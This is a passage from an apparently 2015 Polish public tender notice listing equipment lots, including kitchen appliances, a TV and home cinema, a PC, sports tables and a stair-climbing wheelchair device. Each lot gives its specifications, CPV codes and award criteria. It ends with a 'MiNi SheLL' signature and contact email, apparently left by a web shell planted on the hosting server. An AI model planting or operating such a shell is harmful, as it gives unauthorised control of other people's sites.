-	Zużycie energii w ciągu 24 godzin: 1 kWh
-	Układ chłodzenia: dynamiczny
-	Metoda odszraniania: odszranianie automatyczne
-	Zakres temperatury: +1°C do +15°C 
-	Materiał obudowy/kolor: stal/srebrny
-	Materiał drzwi: stal szlachetna 
-	Drzwi pełne
-	Materiał wnętrza: tworzywo sztuczne w kolorze białym
-	Rodzaj sterowania: sterowanie mechaniczne
-	Wskaźnik temperatury: zewnętrzny cyfrowy
-	Oświetlenie wewnętrzne: żarówka
-	Regulowane półki: min.4szt.
-	Obciążenie półek: min.60 kg
-	Zamek
-	Klasa klimatyczna: SN
-	Czynnik chłodniczy: R 600a
-	Moc znamionowa: 1,1 A/ 120 W
-	Częstotliwość: 240 V 
Ilość zamawianych sztuk: 1.
7. Wyposażenie kuchni - taboret gazowy, wykonany ze stali nierdzewnej, kolor inox/srebrny.
Dane techniczne: 
-	moc całkowita: 9kW
-	przyłącze gazu: R1/2
-	wymiar: min. 6000x600x400
-	palnik z zabezpieczeniem przeciw wypływowym
-	palnik pilotujący
-	energooszczędny palnik 
Ilość zamawianych sztuk: 2.
8. Wyposażenie kuchni - zlewozmywak dwukomorowy z ociekaczem,  wykonany ze stali nierdzewnej. 
Ilość zamawianych sztuk: 1.
9. Wyposażenie łazienek - lustro, ze szkła bezbarwnego, srebrne o szlifowanych krawędziach i wymiarach 35x55cm z uchwytem do zawieszenia.
Ilość zamawianych sztuk: 3.
10. Wyposażenie łazienek - pojemnik na mydło, wieszany na ścianie, wykonany ze stali nierdzewnej o pojemności 0,5 l.
Ilość zamawianych sztuk: 2.
11. Wyposażenie łazienek - pojemnik na ręczniki papierowe, wieszany na ścianie, wykonany ze stali nierdzewnej o wymiarach 30x30cm.
Ilość zamawianych sztuk: 2.
12. Wyposażenie łazienek - pojemnik na papier toaletowy typu POP, wieszany na ścianie, wykonany ze stali nierdzewnej, średnicy 250mm.
Ilość zamawianych sztuk: 3.
13. Wyposażenie łazienek - szczotka do WC, wieszana na ścianie, wykonana ze stali nierdzewnej.
Ilość zamawianych sztuk: 3.
14. Wyposażenie łazienek - kosz na śmieci, stojący, wykonany ze stali nierdzewnej 
o średnicy 25cm i wysokości 35cm
Ilość zamawianych sztuk: 4.
15. Wyposażenie świetlicy- kosz na śmieci, stojący, wykonany ze stali nierdzewnej 
o średnicy 35cm i wysokości 55cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt radiowo-telewizyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na sprzęt radiowo-telewizyjny wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1.Wyposażenie świetlicy - telewizor LCD 47cali, Full HD
Rozdzielczość: 1920x1080 
Obsługa MPEG 4
Teletekst: tak
Nagłośnienie:  -minimum 2 głośniki stereo, moc głośników; min. 10 W
Złącza: -HDMI
-Wejścia Euro: tak
-Wyjście audio: tak 
-Wyjście słuchawkowe: tak
-USB
Konstrukcja: -podstawa i montaż ścienny
Ilość zamawianych sztuk: 1 szt.
2. Wyposażenie świetlicy - radioodtwarzacz CD 
Urządzenie z portem USB i oddzielnymi głośnikami. Odtwarzanie mp3 / CD-R / CD-RW, port USB, tuner FM/AM, pamięć 30 stacji.
Dane techniczne:
Wejście anteny zewnętrznej: tak 
Cyfrowy wyświetlacz LCD: tak
Moc wyjściowa: skuteczna (RMS): 2x20W
Wyjście słuchawkowe: tak 
Pilot: tak
Ilość zamawianych sztuk: 1 szt.
3. Wyposażenie świetlicy - odtwarzacz DVD
Dane techniczne:
Obsługiwane formaty płyt: BD-R, BD-RE, DVD?R, DVD?RW, CD-R, CD-RW, Audio CD, DVD-Video, Xvid, DivX,
Obsługiwane formaty plików: .jpg, .mp3, 
Obsługiwane standardy audio: Dolby Digital Plus, DTS
Wyjścia: USB, HDMI
Ilość zamawianych sztuk: 1 szt.
4. Wyposażenie świetlicy - zestaw kina domowego
Dane techniczne:
Odtwarzacz płyt DVD-Video, DVD-R, DVD-RW, DVD+R, DVD+RW, CD-DA, CD-R, CD-RW formaty multimedialne DivX, XviD, JPEG, MP3, WMV i WMA 
Obsługiwane standardy audio: Dolby Digital, Dolby ProLogic II, DTS
Wyjścia: USB Host, HDMI, komputerowe, kompozytowe, wejście/wyjście optyczne, wejście/wyjście audio, wejście/wyjście scart.
Głośniki:
-	system głośników - 5.1
-	głośniki składowe - 2 głośniki surround , 2 głośniki przednie , głośnik basowy , głośnik centralny
Ilość zamawianych sztuk: 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.30.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Urządzenia komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonawca udziela minimum 24 miesięcznej gwarancji jakości na dostarczony sprzęt komputerowy z oprogramowaniem. Okres gwarancji  rozpocznie się od daty odbioru przedmiotu umowy. 
2. Oprogramowanie komputerowe musi posiadać właściwe licencje. 
3. Urządzenia dostarczone zostaną wraz ze wszystkimi akcesoriami niezbędnymi do umożliwienia ich pracy. Wraz z urządzeniami dostarczone będą instrukcje obsługi i karty gwarancyjne.
4. Szczegółowe warunki gwarancji określają karty gwarancyjne dostarczone przez Wykonawcę.
5. Gwarancja nie może ograniczać praw Zamawiającego do instalowania, reinstalowania, konfiguracji i rekonfiguracji dostarczonego oprogramowania przez przeszkolonych pracowników Zamawiającego, o ile jest to zgodne z warunkami licencji udzielonej przez producenta oprogramowania. 
6. Gwarancja nie może ograniczać praw Zamawiającego do instalowania i wymiany 
w zakupionym sprzęcie standardowych kart i urządzeń przez wykwalifikowanych pracowników zgodnie z zasadami sztuki w tym zakresie. 
7. Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Wyposażenie świetlicy - komputer stacjonarny PC z monitorem i klawiaturą
Dane techniczne:
Zainstalowany system operacyjny:	Windows
Procesor:	4 rdzeniowy powyżej 3,2 MHz
Pamięć standardowa	4 GB DDR3 1600 MHz
Napędy optyczne	Nagrywarka DVD z interfejsem SATA
Wewnętrzny dysk twardy	Dysk SATA min. 1 TB 7200 obr./min
Karta grafiki	DDR 5 (256-bit) - na układzie Radeon HD 6850 lub równoważnym
Dźwięk	zintegrowany z płytą główną
Napęd dyskietek	Czytnik kart pamięci w miejscu FDD
Gniazda rozszerzeń	minimum 1 gniazdo PCI na płycie głównej
Rozszerzenie pamięci	Możliwość rozbudowy do 8 GB
Interfejs sieciowy	Wbudowana karta Gigabit Ethernet
Oprogramowanie
Zainstalowane oprogramowanie	pakiet office (word, excel, powerpoint)
Obudowa	MIDI Tower
Klawiatura	Bezprzewodowa (możliwy komplet z myszą)
Urządzenie wskazujące	Bezprzewodowa (możliwy komplet z klawiaturą)
Zasilanie zewnętrzne	Zasilacz o mocy minimum 400W
Parametry ogólne monitor
Typ matrycy: 	LED
Matryca błyszcząca: 	Nie
Przekątna ekranu [cal]: 	24
Nominalna rozdzielczość [px]: 	1920 x 1080
Złącza
D-Sub i DVI:	TAK
Ilość zamawianych sztuk: 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sprzęt sportowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na sprzęt sportowy wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1.	Wyposażenie świetlicy - stół do tenisa
Dane techniczne:
-	stół tenisowy wewnętrzny (do suchych pomieszczeń).
-	siatka,
-	pozycja play-back.
-	4 pojedyncze kółka transportowe.
-	hamulce bezpieczeństwa x 2 (po przekątnej).
-	uchwyty na piłki i rakietki.
Ilość zamawianych sztuk: 1 kpl.
2.	Wyposażenie świetlicy - piłkarzyki
Dane techniczne: 
-	wymiary minimalne:130 x 70 x 80 cm, 
-	płyty boczne: płyta MDF, grubość minimalna: 14 mm, szerokość: 30-40 cm,  
-	drążki zawodników: chromowana stal, 
-	łożyska kulkowe, 
-	stopki poziomujące.
Ilość zamawianych sztuk: 1. 
3.	Wyposażenie świetlicy - stół bilardowy wraz z niezbędnymi akcesoriami
Dane techniczne:
- blat wykonany z płyty kamiennej jednolitej,
- wymiary: pole gry: 127x254cm,
- możliwość regulacji poziomu,
- wyposażenie: kije (min.6), bile (komplet do pool-a), kreda, podpórka, trójkąt, 
końcówki (10 sztuk).
Ilość zamawianych sztuk: 1.
4. Wyposażenie świetlicy - stół do tenisa  kamienny granitowy 
Wymiary[m]: dł. 2,8; szer. 1,5; wys. 0,80; strefa bezpieczeństwa 5,5x8,8; 
liczba użytkowników 4. 
Zamówienie obejmuje również montaż sprzętu sportowego.
Dane techniczne:
- blat stołu szlifowany, zaimpregnowany specjalnym lakierem,
- siatka stalowa, ocynkowana ogniowo,
- całość wsparta na konstrukcji stalowo-betonowej.
Ilość zamawianych sztuk: 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Urządzenie do transportu osób na wózkach inwalidzkich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na urządzenie do transportu osób na wózkach inwalidzkich wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Urządzenie o konstrukcji metalowej malowanej proszkowo z zasilaniem akumulatorowym umożliwiające transport osób na wózkach inwalidzkich po schodach oraz stromych pochylniach. Ilość zamawianych sztuk: 1.
Minimalne wymagane parametry urządzenia określone dla Scalmobilu S20 - do transportu schodowego w komplecie z markowym wózkiem aktywnym i specjalnymi uchwytami:

Maksymalne obciążenie 	120 kg, 1 osoba wraz z wózkiem
Waga	24,5 kg
Prędkość	6-16 stopni/min.
Zasięg	Do 300 schodów
Schody	Ciągi proste, zakręcające, strome, wąskie, z dowolnego materiału i ze stale przymocowanymi pokryciami, do wnętrza
Napęd	Silnik elektryczny 176W
Baterie	2x12 V3/4 Ah, Dryfit-Typ (bezobsługowe, żelowe)
Wózki	Model manualny

Dopuszcza się urządzenie równoważne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com